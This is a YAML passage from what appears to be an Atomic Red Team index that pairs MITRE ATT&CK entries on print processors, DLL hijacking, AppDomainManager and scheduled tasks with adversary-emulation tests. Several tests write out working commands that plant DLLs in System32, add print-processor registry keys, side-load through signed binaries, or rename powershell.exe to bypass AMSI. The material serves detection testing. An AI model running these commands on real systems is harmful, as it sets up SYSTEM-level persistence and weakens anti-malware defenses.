id: attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad
created: '2020-10-05T13:24:49.780Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1547/012
external_id: T1547.012
- source_name: Microsoft AddPrintProcessor May 2018
description: Microsoft. (2018, May 31). AddPrintProcessor function. Retrieved
October 5, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor
- source_name: Microsoft Intro Print Processors
description: Microsoft. (2023, June 26). Introduction to print processors.
Retrieved September 27, 2023.
url: https://learn.microsoft.com/windows-hardware/drivers/print/introduction-to-print-processors
- source_name: ESET PipeMon May 2020
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
url: https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:35.261Z'
name: 'Boot or Logon Autostart Execution: Print Processors'
description: |-
Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, `spoolsv.exe`, during boot.(Citation: Microsoft Intro Print Processors)
Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the AddPrintProcessor API call with an account that has SeLoadDriverPrivilege enabled. Alternatively, a print processor can be registered to the print spooler service by adding the HKLM\SYSTEM\\[CurrentControlSet or ControlSet001]\Control\Print\Environments\\[Windows architecture: e.g., Windows x64]\Print Processors\\[user defined]\Driver Registry key that points to the DLL.
For the malicious print processor to be correctly installed, the payload must be located in the dedicated system print-processor directory, that can be found with the GetPrintProcessorDirectory API call, or referenced via a relative path from this directory.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020)
The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Mathieu Tartare, ESET
- Tahseen Bin Taj
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
identifier: T1547.012
atomic_tests:
- name: Print Processors
auto_generated_guid: f7d38f47-c61b-47cc-a59d-fc0368f47ed0
description: |
Establishes persistence by creating a new print processor registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors.
The new print processor will point to a DLL which will be loaded by the spooler service after a reboot. The DLL will then create the file AtomicTest.txt in C:\Users\Public\ as validation that the test is successful.
Note: The test assumes a x64 Windows operating system.
The payload source code is based on a blog post by stmxcsr: [https://stmxcsr.com/persistence/print-processor.html](https://stmxcsr.com/persistence/print-processor.html)
supported_platforms:
- windows
input_arguments:
restart:
description: set to 1 if you want the computer to reboot as part of the
test
type: integer
default: 0
executor:
command: |
if( $(get-service -Name spooler).StartType -eq "Disabled") {Set-Service -Name "spooler" -StartupType Automatic}
net stop spooler
Copy-Item "$PathToAtomicsFolder\T1547.012\bin\AtomicTest.dll" C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" /v "Driver" /d "AtomicTest.dll" /t REG_SZ /f
net start spooler
if(#{restart}){
Restart-Computer
}
cleanup_command: |
net stop spooler
rm -force C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll -ErrorAction SilentlyContinue
rm -force C:\Users\Public\AtomicTest.txt -ErrorAction SilentlyContinue
remove-item "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" -Force -ErrorAction SilentlyContinue
net start spooler
name: powershell
elevation_required: true
T1574.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34
created: '2020-03-13T18:11:08.357Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/001
external_id: T1574.001
- source_name: Hijack DLLs CrowdStrike
description: " falcon.overwatch.team. (2022, December 30). 4 Ways Adversaries
Hijack DLLs — and How CrowdStrike Falcon OverWatch Fights Back. Retrieved
January 30, 2025."
url: https://www.crowdstrike.com/en-us/blog/4-ways-adversaries-hijack-dlls/
- source_name: kroll bpl
description: Dave Truman. (2024, June 24). Novel Technique Combination Used
In IDATLOADER Distribution. Retrieved January 30, 2025.
url: https://www.kroll.com/en/insights/publications/cyber/idatloader-distribution
- source_name: Sophos
description: Gabor Szappanos. (2023, May 3). A doubled “Dragon Breath” adds
new air to DLL sideloading attacks. Retrieved October 3, 2025.
url: https://news.sophos.com/en-us/2023/05/03/doubled-dll-sideloading-dragon-breath/
- source_name: Hexacorn DLL Hijacking
description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
Retrieved August 14, 2024.
url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: microsoft remote preloading
description: 'Microsoft. (2014, May 13). Microsoft Security Advisory 2269637:
Insecure Library Loading Could Allow Remote Code Execution. Retrieved January
30, 2025.'
url: https://learn.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637
- source_name: Microsoft - manifests/assembly
description: Microsoft. (2021, January 7). Manifests. Retrieved January 30,
2025.
url: https://learn.microsoft.com/en-us/windows/win32/sbscs/manifests?redirectedfrom=MSDN
- source_name: Microsoft redirection
description: Microsoft. (2023, October 12). Dynamic-link library redirection.
Retrieved January 30, 2025.
url: https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN
- source_name: dll pre load owasp
description: OWASP. (n.d.). Binary Planting. Retrieved January 30, 2025.
url: https://owasp.org/www-community/attacks/Binary_planting
- source_name: Virus Bulletin
description: 'Suguru Ishimaru, Hajime Yanagishita, Yusuke Niwa. (2023, October
5). Unveiling activities of Tropic Trooper 2023: deep analysis of Xiangoop
Loader and EntryShell payload. Retrieved October 3, 2025.'
url: https://www.virusbulletin.com/conference/vb2023/abstracts/unveiling-activities-tropic-trooper-2023-deep-analysis-xiangoop-loader-and-entryshell-payload/
- source_name: unit 42
description: 'Tom Fakterman, Chen Erlich, & Assaf Dahan. (2024, February 22).
Intruders in the Library: Exploring DLL Hijacking. Retrieved January 30,
2025.'
url: https://unit42.paloaltonetworks.com/dll-hijacking-techniques/
- source_name: Wietze Beukema DLL Hijacking
description: Wietze Beukema. (2020, June 22). Hijacking DLLs in Windows. Retrieved
April 8, 2025.
url: https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:35.900Z'
name: 'Hijack Execution Flow: DLL'
description: |-
Adversaries may abuse dynamic-link library files (DLLs) in order to achieve persistence, escalate privileges, and evade defenses. DLLs are libraries that contain code and data that can be simultaneously utilized by multiple programs. While DLLs are not malicious by nature, they can be abused through mechanisms such as side-loading, hijacking search order, and phantom DLL hijacking.(Citation: unit 42)
Specific ways DLLs are abused by adversaries include:
### DLL Sideloading
Adversaries may execute their own malicious payloads by side-loading DLLs. Side-loading involves hijacking which DLL a program loads by planting and then invoking a legitimate application that executes their payload(s).
Side-loading positions both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.
Adversaries may also side-load other packages, such as BPLs (Borland Package Library).(Citation: kroll bpl)
Adversaries may chain DLL sideloading multiple times to fragment functionality hindering analysis. Adversaries using multiple DLL files can split the loader functions across different DLLs, with a main DLL loading the separated export functions. (Citation: Virus Bulletin) Spreading loader functions across multiple DLLs makes analysis harder, since all files must be collected to fully understand the malware’s behavior. Another method implements a “loader-for-a-loader”, where a malicious DLL’s sole role is to load a second DLL (or a chain of DLLs) that contain the real payload. (Citation: Sophos)
### DLL Search Order Hijacking
Adversaries may execute their own malicious payloads by hijacking the search order that Windows uses to load DLLs. This search order is a sequence of special and standard search locations that a program checks when loading a DLL. An adversary can plant a trojan DLL in a directory that will be prioritized by the DLL search order over the location of a legitimate library. This will cause Windows to load the malicious DLL when it is called for by the victim program.(Citation: unit 42)
### DLL Redirection
Adversaries may directly modify the search order via DLL redirection, which after being enabled (in the Registry or via the creation of a redirection file) may cause a program to load a DLL from a different location.(Citation: Microsoft redirection)(Citation: Microsoft - manifests/assembly)
### Phantom DLL Hijacking
Adversaries may leverage phantom DLL hijacking by targeting references to non-existent DLL files. They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.(Citation: Hexacorn DLL Hijacking)(Citation: Hijack DLLs CrowdStrike)
### DLL Substitution
Adversaries may target existing, valid DLL files and substitute them with their own malicious DLLs, planting them with the same name and in the same location as the valid DLL file.(Citation: Wietze Beukema DLL Hijacking)
Programs that fall victim to DLL hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace, evading defenses.
Remote DLL hijacking can occur when a program sets its current directory to a remote location, such as a Web share, before loading a DLL.(Citation: dll pre load owasp)(Citation: microsoft remote preloading)
If a valid DLL is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- Ami Holeston, CrowdStrike
- Will Alexander, CrowdStrike
- Wietze Beukema @Wietze
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1574.001
atomic_tests:
- name: DLL Search Order Hijacking - amsi.dll
auto_generated_guid: 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3
description: |
Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface)
https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/
Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path.
supported_platforms:
- windows
executor:
command: |
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
%APPDATA%\updater.exe -Command exit
cleanup_command: |
del %APPDATA%\updater.exe >nul 2>&1
del %APPDATA%\amsi.dll >nul 2>&1
name: command_prompt
elevation_required: true
- name: Phantom Dll Hijacking - WinAppXRT.dll
auto_generated_guid: 46ed938b-c617-429a-88dc-d49b5c9ffedb
description: ".NET components (a couple of DLLs loaded anytime .NET apps are
executed) when they are loaded they look for an environment variable called
APPX_PROCESS\nSetting the environmental variable and dropping the phantom
WinAppXRT.dll in e.g. c:\\windows\\system32 (or any other location accessible
via PATH) will ensure the \nWinAppXRT.dll is loaded everytime user launches
an application using .NET.\n\nUpon successful execution, amsi.dll will be
copied and renamed to WinAppXRT.dll and then WinAppXRT.dll will be copied
to system32 folder for loading during execution of any .NET application.\n"
supported_platforms:
- windows
executor:
command: |
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
ren %APPDATA%\amsi.dll WinAppXRT.dll
copy %APPDATA%\WinAppXRT.dll %windir%\System32\WinAppXRT.dll
reg add "HKEY_CURRENT_USER\Environment" /v APPX_PROCESS /t REG_EXPAND_SZ /d "1" /f
cleanup_command: |
reg delete "HKEY_CURRENT_USER\Environment" /v APPX_PROCESS /f
del %windir%\System32\WinAppXRT.dll
del %APPDATA%\WinAppXRT.dll
name: command_prompt
elevation_required: true
- name: Phantom Dll Hijacking - ualapi.dll
auto_generated_guid: 5898902d-c5ad-479a-8545-6f5ab3cfc87f
description: |
Re-starting the Print Spooler service leads to C:\Windows\System32\ualapi.dll being loaded
A malicious ualapi.dll placed in the System32 directory will lead to its execution whenever the system starts
Upon successful execution, amsi.dll will be copied and renamed to ualapi.dll and then ualapi.dll will be copied to system32 folder for loading during system restart.
Print Spooler service is also configured to auto start. Reboot of system is required
supported_platforms:
- windows
executor:
command: |
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
ren %APPDATA%\amsi.dll ualapi.dll
copy %APPDATA%\ualapi.dll %windir%\System32\ualapi.dll
sc config Spooler start=auto
cleanup_command: |
del %windir%\System32\ualapi.dll
del %APPDATA%\ualapi.dll
name: command_prompt
elevation_required: true
- name: DLL Side-Loading using the Notepad++ GUP.exe binary
auto_generated_guid: 65526037-7079-44a9-bda1-2cb624838040
description: |
GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded.
Upon execution, calc.exe will be opened.
supported_platforms:
- windows
input_arguments:
process_name:
description: Name of the created process
type: string
default: calculator.exe
gup_executable:
description: GUP is an open source signed binary used by Notepad++ for software
updates
type: path
default: PathToAtomicsFolder\T1574.002\bin\GUP.exe
dependency_executor_name: powershell
dependencies:
- description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable})
'
prereq_command: 'if (Test-Path "#{gup_executable}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{gup_executable}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}"
executor:
command: '"#{gup_executable}"
'
cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
'
name: command_prompt
- name: DLL Side-Loading using the dotnet startup hook environment variable
auto_generated_guid: d322cdd7-7d60-46e3-9111-648848da7c02
description: 'Utilizing the dotnet_startup_hooks environment variable, this
method allows for registering a global method in an assembly that will be
executed whenever a .net core application is started. This unlocks a whole
range of scenarios, from injecting a profiler to tweaking a static context
in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1)
'
supported_platforms:
- windows
input_arguments:
process_name:
description: Name of the created process
type: string
default: calculator.exe
preloader_dll:
description: library for interfacing with the dotnet framework
type: path
default: PathToAtomicsFolder\T1574.002\bin\preloader.dll
dependency_executor_name: powershell
dependencies:
- description: ".Net SDK must be installed\n"
prereq_command: 'if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit
0} else {exit 1}
'
get_prereq_command: |
winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null
echo.
- description: 'preloader must exist
'
prereq_command: 'if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1}
'
get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/bin/preloader.dll?raw=true"
-OutFile "#{preloader_dll}"
'
executor:
command: |
set DOTNET_STARTUP_HOOKS="#{preloader_dll}"
dotnet -h > nul
echo.
cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
'
name: command_prompt
- name: DLL Search Order Hijacking,DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE
auto_generated_guid: c095ad8e-4469-4d33-be9d-6f6d1fb21585
description: 'Various threat actors and malware have been found side loading
a masqueraded "KeyScramblerIE.dll" through "KeyScrambler.exe", which can load
further executables embedded in modified KeyScramblerIE.dll file.
'
supported_platforms:
- windows
executor:
command: |-
Write-Host 1.Downloading KeyScrambler from official website to temp directory
Invoke-WebRequest -Uri "https://download.qfxsoftware.com/download/latest/KeyScrambler_Setup.exe" -OutFile $env:Temp\KeyScrambler_Setup.exe
Write-Host 2.Installing KeyScrambler with KeyScrambler_Setup.exe from temp directory
Start-Process -FilePath $env:Temp\KeyScrambler_Setup.exe -ArgumentList /S -Wait
Write-Host 3.Copying KeyScrambler.exe to temp folder,to avoid permission issues, which calls KeyScramblerIE.dll in CWD i.e. temp
Copy-Item "C:\Program Files (x86)\KeyScrambler\KeyScrambler.exe" -Destination $env:TEMP\KeyScrambler.exe
Write-Host 4.Executing KeyScrambler.exe, you should see a popup of missing KeyScramblerIE.dll, you can close this popup
Start-Process -FilePath $env:Temp\KeyScrambler.exe
Write-Host 5.A modified KeyScramblerIE.dll can be copied to temp, which can be misused by Attacker
cleanup_command: |-
Write-Host 1.Kindly close the popup window asking for KeyScramblerIE.dll ,so that it gets deleted.
Remove-Item -Path $env:Temp\KeyScrambler_Setup.exe
Start-Process -FilePath "C:\Program Files (x86)\KeyScrambler\Uninstall.exe" -ArgumentList /S -Wait
Remove-Item -Path $env:Temp\KeyScrambler.exe
Write-Host 2.KeyScrambler cleanup completed successfully.
name: powershell
elevation_required: true
T1574.014:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--356662f7-e315-4759-86c9-6214e2a50ff8
created: '2024-03-28T15:36:34.141Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/014
external_id: T1574.014
- source_name: PenTestLabs AppDomainManagerInject
description: Administrator. (2020, May 26). APPDOMAINMANAGER INJECTION AND
DETECTION. Retrieved March 28, 2024.
url: https://pentestlaboratories.com/2020/05/26/appdomainmanager-injection-and-detection/
- source_name: Microsoft App Domains
description: Microsoft. (2021, September 15). Application domains. Retrieved
March 28, 2024.
url: https://learn.microsoft.com/dotnet/framework/app-domains/application-domains
- source_name: PwC Yellow Liderc
description: PwC Threat Intelligence. (2023, October 25). Yellow Liderc ships
its scripts and delivers IMAPLoader malware. Retrieved March 29, 2024.
url: https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html
- source_name: Rapid7 AppDomain Manager Injection
description: 'Spagnola, N. (2023, May 5). AppDomain Manager Injection: New
Techniques For Red Teams. Retrieved March 29, 2024.'
url: https://www.rapid7.com/blog/post/2023/05/05/appdomain-manager-injection-new-techniques-for-red-teams/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T21:48:08.401Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
the `AppDomainManager` class to create and manage one or more isolated runtime
environments (called application domains) inside a process to host the execution
of .NET applications. Assemblies (`.exe` or `.dll` binaries compiled to run
as .NET code) may be loaded into an application domain as executable code.(Citation:
Microsoft App Domains) \n\nKnown as \"AppDomainManager injection,\" adversaries
may execute arbitrary code by hijacking how .NET applications load assemblies.
For example, malware may create a custom application domain inside a target
process to load and execute an arbitrary assembly. Alternatively, configuration
files (`.config`) or process environment variables that define .NET runtime
settings may be tampered with to instruct otherwise benign .NET applications
to load a malicious assembly (identified by name) into the target process.(Citation:
PenTestLabs AppDomainManagerInject)(Citation: PwC Yellow Liderc)(Citation:
Rapid7 AppDomain Manager Injection)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Thomas B
- Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
atomic_tests: []
T1098.006:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--35d30338-5bfa-41b0-a170-ec06dfd75f64
created: '2023-07-14T14:01:50.806Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1098/006
external_id: T1098.006
- source_name: AWS EKS IAM Roles for Service Accounts
description: Amazon Web Services. (n.d.). IAM roles for service accounts.
Retrieved July 14, 2023.
url: https://docs.aws.amazon.com/eks/latest/userguide/iam-roles-for-service-accounts.html
- source_name: Google Cloud Kubernetes IAM
description: Google Cloud. (n.d.). Create IAM policies. Retrieved July 14,
2023.
url: https://cloud.google.com/kubernetes-engine/docs/how-to/iam
- source_name: Kuberentes ABAC
description: Kuberenets. (n.d.). Using ABAC Authorization. Retrieved July
14, 2023.
url: https://kubernetes.io/docs/reference/access-authn-authz/abac/
- source_name: Kubernetes RBAC
description: Kubernetes. (n.d.). Role Based Access Control Good Practices.
Retrieved March 8, 2023.
url: https://kubernetes.io/docs/concepts/security/rbac-good-practices/
- source_name: Aquasec Kubernetes Attack 2023
description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
2023.
url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
- source_name: Microsoft Azure Kubernetes Service Service Accounts
description: Microsoft Azure. (2023, April 28). Access and identity options
for Azure Kubernetes Service (AKS). Retrieved July 14, 2023.
url: https://learn.microsoft.com/en-us/azure/aks/concepts-identity
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T21:46:31.661Z'
name: Additional Container Cluster Roles
description: "An adversary may add additional roles or permissions to an adversary-controlled
user or service account to maintain persistent access to a container orchestration
system. For example, an adversary with sufficient permissions may create a
RoleBinding or a ClusterRoleBinding to bind a Role or ClusterRole to a Kubernetes
account.(Citation: Kubernetes RBAC)(Citation: Aquasec Kubernetes Attack 2023)
Where attribute-based access control (ABAC) is in use, an adversary with sufficient
permissions may modify a Kubernetes ABAC policy to give the target account
additional permissions.(Citation: Kuberentes ABAC)\n \nThis account modification
may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136)
or other malicious account activity. Adversaries may also modify existing
[Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have
compromised. \n\nNote that where container orchestration systems are deployed
in cloud environments, as with Google Kubernetes Engine, Amazon Elastic Kubernetes
Service, and Azure Kubernetes Service, cloud-based role-based access control
(RBAC) assignments or ABAC policies can often be used in place of or in addition
to local permission assignments.(Citation: Google Cloud Kubernetes IAM)(Citation:
AWS EKS IAM Roles for Service Accounts)(Citation: Microsoft Azure Kubernetes
Service Service Accounts) In these cases, this technique may be used in conjunction
with [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003)."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Containers
x_mitre_version: '1.0'
atomic_tests: []
T1053:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
created: '2017-05-31T21:30:46.977Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1053
external_id: T1053
- source_name: ProofPoint Serpent
description: Campbell, B. et al. (2022, March 21). Serpent, No Swiping! New
Backdoor Targets French Entities with Unique Attack Chain. Retrieved April
11, 2022.
url: https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain
- source_name: TechNet Task Scheduler Security
description: Microsoft. (2005, January 21). Task Scheduler and security. Retrieved
June 8, 2016.
url: https://technet.microsoft.com/en-us/library/cc785125.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:38.539Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.(Citation: ProofPoint Serpent)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Prashant Verma, Paladion
- Leo Loobeek, @leoloobeek
- Travis Smith, Tripwire
- Alain Homewood, Insomnia Security
- Andrew Northern, @ex_raritas
- Bryan Campbell, @bry_campbell
- Zachary Abzug, @ZackDoesML
- Selena Larson, @selenalarson
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Containers
- ESXi
x_mitre_version: '2.4'
x_mitre_remote_support: false
atomic_tests: []
T1098.007:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
created: '2024-08-05T20:49:49.809Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1098/007
external_id: T1098.007
- source_name: Cyber Security News
description: Kaaviya. (n.d.). SuperBlack Actors Exploiting Two Fortinet Vulnerabilities
to Deploy Ransomware. Retrieved September 22, 2025.
url: https://cybersecuritynews.com/superblack-actors-exploiting-two-fortinet-vulnerabilities/
- source_name: Linux Usermod
description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
- source_name: Microsoft Net Group
description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
2024.
url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
- source_name: Microsoft Net Localgroup
description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
5, 2024.
url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
- source_name: Microsoft RDP Logons
description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
Services. Retrieved August 5, 2024.
url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
- source_name: RootDSE AD Detection 2022
description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
Active Directory environments. Retrieved August 5, 2024.
url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-09-26T18:25:02.290Z'
name: Additional Local or Domain Groups
description: "An adversary may add additional local or domain groups to an adversary-controlled
account to maintain persistent access to a system or domain.\n\nOn Windows,
accounts may use the `net localgroup` and `net group` commands to add existing
users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
added to the local administrators group on Windows devices to maintain elevated
privileges. They may also be added to the Remote Desktop Users group, which
allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
to log into the endpoints in the future.(Citation: Microsoft RDP Logons) Adversaries
may also add accounts to VPN user groups to gain future persistence on the
network.(Citation: Cyber Security News) On Linux, accounts may be added to
the sudoers group, allowing them to persistently leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
for elevated privileges. \n\nIn Windows environments, machine accounts may
also be added to domain groups. This allows the local SYSTEM account to gain
privileges on the domain.(Citation: RootDSE AD Detection 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- macOS
- Linux
x_mitre_version: '1.1'
atomic_tests: []
T1055.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6
created: '2020-01-14T01:28:32.166Z'
